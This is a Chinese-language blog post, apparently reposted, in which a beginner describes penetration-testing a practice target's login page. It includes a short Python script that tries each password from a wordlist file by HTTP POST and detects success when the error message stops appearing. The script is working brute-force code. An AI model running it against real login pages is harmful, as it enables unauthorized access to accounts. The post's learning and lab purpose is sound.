在做滲透時,因為太菜了,不會用網上的爆破工具,自己就即興瞎寫了一個簡單的字典爆破,新手小白可以借鑒思路,,大佬繞道!!,勿噴,就當學習了(其實我覺得能用就行),
如果有好用的爆破工具,歡迎大佬推薦~
方便理解,我簡單說一下背景:
滲透的是某靶機的網站,該靶機只用輸入正確密碼就能成功登錄,在密碼錯誤后在html中會回傳如下欄位:

所以我用爬蟲把這個關鍵欄位給爬出來了與正確密碼作比較
import json
from pyquery import PyQuery
import requests
url="這里是url地址(這里為了防止惡意攻擊,就不把地址放出來了)"
text="對不起,登錄ID或密碼(口令)錯誤" #這里面的文本是爬蟲爬出來的網頁回傳的值
real_password=0
time=0
e=open('pwd.txt',"r")
print("密碼爆破開始!")
for login_password in e:
data={'password':login_password}
r = requests.post(url,data=data)
doc=PyQuery(r.text)
time+=1
if doc("#tagContent0 p").text()!=text: #這里拿爬出來的資料和文本作對比,相同則說明密碼還是錯的,不同說明密碼就對了!
real_password=login_password
break
print("密碼錯誤,嘗試爆破第{}次".format(time))
print("爆破結束!!")
print("爆破密碼為:{}".format(real_password))
e.close()
因為沒有把該靶,這個代碼需要你們改改才能用
運行截圖:

簡單記錄一下下次的打算(記性差,免得忘了): 下次有機會寫一個被加密后的密碼的爆破(js逆向)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/344125.html
標籤:其他
上一篇:Web安全原理剖析(十七)——XSS常用陳述句及編碼繞過
下一篇:聯合注入小技巧
